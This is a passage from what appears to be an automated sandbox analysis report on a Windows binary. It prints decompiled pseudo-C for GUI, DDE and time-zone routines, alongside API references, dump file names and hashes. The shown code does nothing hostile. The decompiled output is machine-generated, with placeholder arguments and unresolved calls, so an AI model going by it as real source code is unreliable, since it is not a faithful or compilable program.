				FillRect( *(_t72 + 4),  &_v20, _t52);
				CopyRect( &_v20, _a8);
				_t70 = _a16;
				_v20.bottom = _v20.top + _t70;
				_t59 = _a12;
				_v20.left = _v20.left + _t59;
				_v20.right = _v20.right - _t59;
				_t60 = _a20;
				if(_t60 != 0) {
					_t60 =  *(_t60 + 4);
				}
				FillRect( *(_t72 + 4),  &_v20, _t60);
				_t64 = _a8->bottom;
				_v20.bottom = _t64;
				_v20.top = _t64 - _t70;
				_t66 = _a20;
				if(_t66 != 0) {
					_t66 =  *(_t66 + 4);
				}
				return FillRect( *(_t72 + 4),  &_v20, _t66);
			}

APIs

CopyRect.USER32 ref: 004232DB
FillRect.USER32 ref: 00423303
FillRect.USER32 ref: 00423326
CopyRect.USER32 ref: 0042332F
FillRect.USER32 ref: 00423357
FillRect.USER32 ref: 00423379

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction ID: dd711018ace7994bf7c1ba7351bcb303de77ebc25f490cf6722cdbc4bd81ee43
Opcode Fuzzy Hash: 1f7a0c567dd02a9799e9569733d7d4d00d166ec089ce18eed205e1d7e4f0d021
Instruction Fuzzy Hash: EB319A75A0011AAFCF00DFA9CD85DAEBBF8FF08354B488566B914D7211D730EA14DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD49, Relevance: 9.1, APIs: 6, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CD49(void* __ecx, void* __eflags) {
				void* _t57;
				void* _t75;
				void* _t77;

				E00406520(E0042A90C, _t77);
				_t75 = __ecx;
				_push(__ecx);
				E0041A41D(_t77 - 0x40, __eflags);
				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
				E0041A2F1(_t75, _t77 - 0x1c);
				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041A13B(_t77 - 0x40, _t77 - 0x2c);
				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
				E0041F306(_t75, _t77 - 0x40, _t77 - 0x1c);
				E0041A17D(_t77 - 0x40, _t77 - 0x1c);
				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
				E0041F4B4(_t75, _t77 - 0x40, _t77 - 0x1c);
				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				_t57 = E0041A48F(_t77 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t57;
			}

APIs

__EH_prolog.LIBCMT ref: 0041EE8E

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

GetClientRect.USER32 ref: 0041EEAE
GetWindowRect.USER32 ref: 0041EEBB

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

OffsetRect.USER32(?,?,?), ref: 0041EEE2

Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A160
Part of subcall function 0041A13B: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0041A175

OffsetRect.USER32(?,?,?), ref: 0041EF00

Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1A2
Part of subcall function 0041A17D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0041A1B7

SendMessageA.USER32 ref: 0041EF27

Part of subcall function 0041A48F: __EH_prolog.LIBCMT ref: 0041A494
Part of subcall function 0041A48F: ReleaseDC.USER32 ref: 0041A4B3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2727942566-0
Opcode ID: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction ID: 5eac70104d705e6b181efe7a53c40368cdb347892f906ea361a41ca3bb60cced
Opcode Fuzzy Hash: 7de316de083159d7223219551aab25396c84a8cce25eaa9a559a5c946e8f9942
Instruction Fuzzy Hash: 0721DBB1D0011EABCF15EBA5DC49DEEB77CEB44314F00412AE512E3191DB78A94ACB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDC7, Relevance: 9.1, APIs: 6, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041BDC7(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				struct tagRECT _v36;
				struct HDC__* _v48;
				struct HDC__* _v52;
				char _v56;
				struct tagTEXTMETRICA _v112;
				void* __ebp;
				void* _t28;
				int _t38;
				intOrPtr* _t43;
				intOrPtr _t55;
				intOrPtr* _t56;
				intOrPtr _t57;

				_t56 = __ecx;
				_push(0);
				E0041A369( &_v56, __eflags);
				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_v8 = 0;
				if(_t28 != 0) {
					_v8 = SelectObject(_v52, _t28);
				}
				GetTextMetricsA(_v48,  &_v112);
				_t63 = _v8;
				if(_v8 != 0) {
					SelectObject(_v52, _v8);
				}
				E0041A3DB( &_v56);
				SetRectEmpty( &_v36);
				E00424F9B(_t56, _t63,  &_v36, _a12);
				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
				_t38 = GetSystemMetrics(6);
				_t57 =  *((intOrPtr*)(_t56 + 0x78));
				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
				if(_t55 < _t57) {
					_t55 = _t57;
				}
				_t43 = _a4;
				 *_t43 = 0x7fff;
				 *((intOrPtr*)(_t43 + 4)) = _t55;
				return _t43;
			}

APIs

Part of subcall function 0041A369: __EH_prolog.LIBCMT ref: 0041A36E
Part of subcall function 0041A369: GetDC.USER32(00000000), ref: 0041A397

SendMessageA.USER32 ref: 0041BDE4
SelectObject.GDI32(?,00000000), ref: 0041BDFB
GetTextMetricsA.GDI32(?,?), ref: 0041BE07
SelectObject.GDI32(?,?), ref: 0041BE18
SetRectEmpty.USER32(?), ref: 0041BE26
GetSystemMetrics.USER32 ref: 0041BE5B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
String ID:
API String ID: 1789613188-0
Opcode ID: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction ID: 4a213af7df46fba370d1b0da78e664596150d00b2e67ee82928ccd15ad32fd7f
Opcode Fuzzy Hash: f3ce4ba8643c189502a2e8205a1fcc3ffbf1915ab82a651b6741dc22f3fbcf87
Instruction Fuzzy Hash: 5E214C72A00219EFCF00DFA4DC88CEEBBBAFF48304B54402AE502A7250DB346E51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBD7, Relevance: 9.1, APIs: 6, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBD7(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t6;
				void* _t12;
				struct HWND__** _t14;
				struct HWND__* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t17 = _a4;
				_t16 = _t17;
				if(_t17 != 0) {
					L16:
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {
						L4:
						_t15 = _t16;
						_t6 = _t16;
						if(_t16 == 0) {
							L6:
							if(_t17 == 0 && _t16 != 0) {
								_t16 = GetLastActivePopup(_t16);
							}
							_t14 = _a8;
							if(_t14 != 0) {
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {
									 *_t14 =  *_t14 & 0x00000000;
								} else {
									 *_t14 = _t15;
									EnableWindow(_t15, 0);
								}
							}
							return _t16;
						} else {
							goto L5;
						}
						do {
							L5:
							_t15 = _t6;
							_t6 = GetParent(_t6);
						} while (_t6 != 0);
						goto L6;
					}
					_t16 = GetParent(_t16);
					L15:
					if(_t16 == 0) {
						goto L4;
					}
					goto L16;
				}
				_t12 = E0041BC73();
				if(_t12 != 0) {
					L14:
					_t16 =  *(_t12 + 0x1c);
					goto L15;
				}
				_t12 = E00404DAE();
				if(_t12 != 0) {
					goto L14;
				}
				_t16 = 0;
				goto L4;
			}

APIs

GetParent.USER32(?), ref: 0041BC0A
GetLastActivePopup.USER32(?), ref: 0041BC19
IsWindowEnabled.USER32(?), ref: 0041BC2E
EnableWindow.USER32(?,00000000), ref: 0041BC41
GetWindowLongA.USER32 ref: 0041BC53
GetParent.USER32(?), ref: 0041BC61

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction ID: 79cfeeef415f6b616a2a8b62cc4a1a68cb8ced5d87a6c48b433ad5091e6d0582
Opcode Fuzzy Hash: 57eef139ee9fad572674954af371fb940630e9610c65e8faf2eb96e97349b3f3
Instruction Fuzzy Hash: 5F119E327012216B86312A6A9C84BABB398DF94B54F09052FEC00E7314FF28DC8242ED

Uniqueness

Uniqueness Score: -1.00%

Function 00420A8B, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420A8B(intOrPtr _a4) {
				intOrPtr _v4;
				struct HWND__* _t15;
				struct HWND__* _t17;
				signed int _t21;
				intOrPtr _t28;
				void* _t30;
				struct HWND__* _t32;

				_v4 = _t28;
				_t15 = GetWindow(GetDesktopWindow(), 5);
				_t32 = _t15;
				if(_t32 == 0) {
					return _t15;
				} else {
					while(1) {
						_push(_t32);
						_t30 = E00413767();
						if(_t30 != 0) {
							_t19 =  *((intOrPtr*)(_v4 + 0x1c));
							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E004208E0(_t19, _t32) != 0) {
								_t21 = GetWindowLongA(_t32, 0xfffffff0);
								if(_a4 != 0) {
									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {
										ShowWindow(_t32, 4);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;
									}
								} else {
									if((_t21 & 0x18000000) == 0x10000000) {
										ShowWindow(_t32, 0);
										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;
									}
								}
							}
						}
						_t17 = GetWindow(_t32, 2);
						_t32 = _t17;
						if(_t32 == 0) {
							return _t17;
						}
					}
				}
			}

APIs

GetDesktopWindow.USER32 ref: 00420A94
GetWindow.USER32(00000000), ref: 00420AA1
GetWindowLongA.USER32 ref: 00420AD6
ShowWindow.USER32(00000000,00000000), ref: 00420AF2
ShowWindow.USER32(00000000,00000004), ref: 00420B0A
GetWindow.USER32(00000000,00000002), ref: 00420B13

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction ID: 7b09bf3e44239edb134f584a809b554a06cce84e6abb4a59c0b4e2be1682ca92
Opcode Fuzzy Hash: 75e0d79f770b091ef330ac2764b5b8086804e695f3b5458a2b2fdd0c27fc218f
Instruction Fuzzy Hash: 5F11C27170173926D2319664AC49F1FBBDC9F51768FD00616FA10A3286DBACE84186AD

Uniqueness

Uniqueness Score: -1.00%

Function 0042986F, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042986F(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				int _t14;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E004298F1(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E004296EA(_t14, __ecx, 0, 0);
			}

0x00429872
0x00429873
0x00429884
0x0042988f
0x00429898
0x0042989b
0x004298a5
0x004298b3
0x004298c3
0x004298de
0x004298f0

APIs

GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
GetDeviceCaps.GDI32(?,00000008), ref: 0042988D

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetMapMode.GDI32(?,00000001), ref: 004298A5
SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Part of subcall function 004296EA: GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
Part of subcall function 004296EA: GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,00000058), ref: 00429779
Part of subcall function 004296EA: GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
Part of subcall function 004296EA: SetMapMode.GDI32(00000000,00000008), ref: 004297BC
Part of subcall function 004296EA: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
Part of subcall function 004296EA: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
String ID:
API String ID: 1729379761-0
Opcode ID: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction ID: ffdc988b3e99ab10a3d87d522c915a36f24d74d83ef75783a8118d4b02154ef1
Opcode Fuzzy Hash: a4606df614c38f46bd77f44db7aac540e81f224dfc611dbedfe682ee8124c0ad
Instruction Fuzzy Hash: 10012D31600204BFDB315B56DC4AD5BBFB9EF89B20B40462DF166921A0DB71AD11DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004215FF, Relevance: 9.1, APIs: 6, Instructions: 53
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004215FF(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
				void* _v8;
				char _v12;
				char _v532;
				void* __ebp;
				long _t19;
				void* _t23;
				void* _t27;

				_push( &_v8);
				_push( &_v12);
				_push(_a8);
				_t27 = __ecx;
				_push(0x3e8);
				L0040C37C();
				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);
				_t19 = GlobalUnlock(_v8);
				_push(_v8);
				_push(0x8000);
				_push(0x3e4);
				_push(0x3e8);
				_push(_a8);
				L0040C376();
				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);
				if(E004166B3(_t27) != 0) {
					_t23 = E00424BFB();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);
				}
				return 0;
			}

APIs

UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042161E
GlobalLock.KERNEL32 ref: 00421626
lstrcpynA.KERNEL32(?,00000000,00000208), ref: 00421639
GlobalUnlock.KERNEL32(?), ref: 00421642
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042165A
PostMessageA.USER32 ref: 00421667

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
String ID:
API String ID: 2333435275-0
Opcode ID: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction ID: 4c25832e6e6faa34b872796a1f01560d3fa617591b77e043d0f58556844ee018
Opcode Fuzzy Hash: ece78e31169d89b8200c4b439bb097272c644a8961ddb8c6434ced5d484acce8
Instruction Fuzzy Hash: 86018436600108FFDB11ABA1DC89EDF7BBDEF58304F004175B909E6161DB349E559BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8B4, Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A8B4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t7;
				struct HWND__* _t9;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t9 = _a4;
					if(_t11 != _t9) {
						if(E0041A759(_t11, 3) != 0) {
							L5:
							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
								L8:
								return SendMessageA(_t11, 0x14f, 0, 0);
							}
							_t7 = GetParent(_t9);
							_t3 = GetDesktopWindow();
							if(_t7 != _t3) {
								goto L8;
							}
						} else {
							_t3 = GetParent(_t11);
							_t11 = _t3;
							if(_t11 != _t9) {
								_t3 = E0041A759(_t11, 2);
								if(_t3 != 0) {
									goto L5;
								}
							}
						}
					}
				}
				return _t3;
			}

APIs

GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

GetParent.USER32(00000000), ref: 0041A8DE

Part of subcall function 0041A759: GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
Part of subcall function 0041A759: lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794

GetWindowLongA.USER32 ref: 0041A8F9
GetParent.USER32(?), ref: 0041A907
GetDesktopWindow.USER32 ref: 0041A90B
SendMessageA.USER32 ref: 0041A91F

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction ID: 0ef3fffee83f5250149677f0c627e80be30cc9893a9c62ed2a9ad1800b3459ea
Opcode Fuzzy Hash: 702e787500185d0e95f91e2b00d5798637d6bfb9626d06ae0c90c1e83ac116f9
Instruction Fuzzy Hash: 27F0F9712022212AD23127355C4CBEF53689F86B58F5A0527F411E62D0EB1CDDD241AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7CE, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041A7CE(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t22;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t22 = GetWindow();
					if(_t22 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
						L5:
						_push(2);
						_push(_t22);
						continue;
					} else {
						GetWindowRect(_t22,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t22;
						}
						goto L5;
					}
				}
				return 0;
			}

APIs

ClientToScreen.USER32(?,?), ref: 0041A7DD
GetWindow.USER32(?,00000005), ref: 0041A7EE
GetDlgCtrlID.USER32 ref: 0041A7F7
GetWindowLongA.USER32 ref: 0041A806
GetWindowRect.USER32 ref: 0041A818
PtInRect.USER32(?,?,?), ref: 0041A828

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction ID: 073ddf0fe74a93c2ca18b2cdbf6cccc684bfe4d9908968ef648256188d18c8f8
Opcode Fuzzy Hash: 59ce7e949d72d20d3b0e1046ee7cd880fa8c9e45b96b8167ce34cd237f8108ea
Instruction Fuzzy Hash: AE017C31201119BBDB21AB649C08EEF776CEF54710F804531F911D51A0E734D963CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A586, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A586() {
				int _v8;
				char* _v12;
				void* __ecx;
				char* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				char* _t27;
				char _t29;
				char _t30;
				signed int _t32;
				char _t34;
				void* _t35;
				char _t36;
				void* _t37;
				signed int _t39;
				signed int _t40;
				char* _t43;
				char* _t46;
				intOrPtr _t47;
				void* _t56;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				char* _t74;
				char* _t76;
				signed int** _t80;
				intOrPtr _t86;
				intOrPtr _t88;

				_push(_t55);
				_t70 = 0xc;
				_v12 = 0;
				E004079D4(_t70);
				 *0x4373d8 =  *0x4373d8 | 0xffffffff;
				 *0x4373c8 =  *0x4373c8 | 0xffffffff;
				 *0x439f08 = 0;
				 *_t80 = 0x42f6a8;
				_t74 = E0040B475();
				_t56 = _t69;
				if(_t74 != 0) {
					if( *_t74 == 0) {
						L41:
						_t18 = E00407A35(_t70);
					} else {
						_t19 =  *0x439fbc; // 0x0
						if(_t19 == 0) {
							L18:
							E004062E0( *0x439fbc);
							_t23 = E00405667(E00405A40(_t74) + 1);
							 *0x439fbc = _t23;
							if(_t23 == 0) {
								goto L41;
							} else {
								E00409B00(_t23, _t74);
								E00407A35(_t70);
								E0040AD30( *0x4373bc, _t74, 3);
								_t27 =  *0x4373bc; // 0x43733c
								_t76 = _t74 + 3;
								_t27[3] = _t27[3] & 0x00000000;
								if( *_t76 == 0x2d) {
									_v12 = 1;
									_t76 = _t76 + 1;
								}
								_t60 = E004068F6(_t56, _t76) * 0xe10;
								 *0x437330 = _t60;
								while(1) {
									_t29 =  *_t76;
									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
										break;
									}
									_t76 = _t76 + 1;
								}
								if( *_t76 == 0x3a) {
									_t76 = _t76 + 1;
									_t32 = E004068F6(_t60, _t76);
									_t63 =  *0x437330; // 0x7080
									_t60 = _t63 + _t32 * 0x3c;
									 *0x437330 = _t60;
									while(1) {
										_t34 =  *_t76;
										if(_t34 < 0x30 || _t34 > 0x39) {
											break;
										}
										_t76 = _t76 + 1;
									}
									if( *_t76 == 0x3a) {
										_t76 = _t76 + 1;
										_t35 = E004068F6(_t60, _t76);
										_t65 =  *0x437330; // 0x7080
										_t60 = _t65 + _t35;
										 *0x437330 = _t60;
										while(1) {
											_t36 =  *_t76;
											if(_t36 < 0x30 || _t36 > 0x39) {
												goto L36;
											}
											_t76 = _t76 + 1;
										}
									}
								}
								L36:
								if(_v12 != 0) {
									 *0x437330 =  ~_t60;
								}
								_t30 =  *_t76;
								 *0x437334 = _t30;
								if(_t30 == 0) {
									goto L40;
								} else {
									E0040AD30( *0x4373c0, _t76, 3);
									_t18 =  *0x4373c0; // 0x43737c
									_t18[3] = _t18[3] & 0x00000000;
								}
							}
						} else {
							_t37 = E00409A70(_t74, _t19);
							_pop(_t56);
							if(_t37 == 0) {
								goto L41;
							} else {
								goto L18;
							}
						}
					}
				} else {
					E00407A35(_t70);
					 *_t80 = 0x439f10;
					_t18 = GetTimeZoneInformation(??);
					if(_t18 != 0xffffffff) {
						_t39 =  *0x439f10; // 0x0
						_t67 =  *0x439f64; // 0x0
						_t40 = _t39 * 0x3c;
						_t86 =  *0x439f56; // 0x0
						_t68 = 1;
						 *0x437330 = _t40;
						 *0x439f08 = _t68;
						if(_t86 != 0) {
							 *0x437330 = _t40 + _t67 * 0x3c;
						}
						_t88 =  *0x439faa; // 0x0
						if(_t88 == 0) {
							L7:
							 *0x437334 = 0;
							 *0x437338 = 0;
						} else {
							_t47 =  *0x439fb8; // 0x0
							if(_t47 == 0) {
								goto L7;
							} else {
								 *0x437334 = _t68;
								 *0x437338 = (_t47 - _t67) * 0x3c;
							}
						}
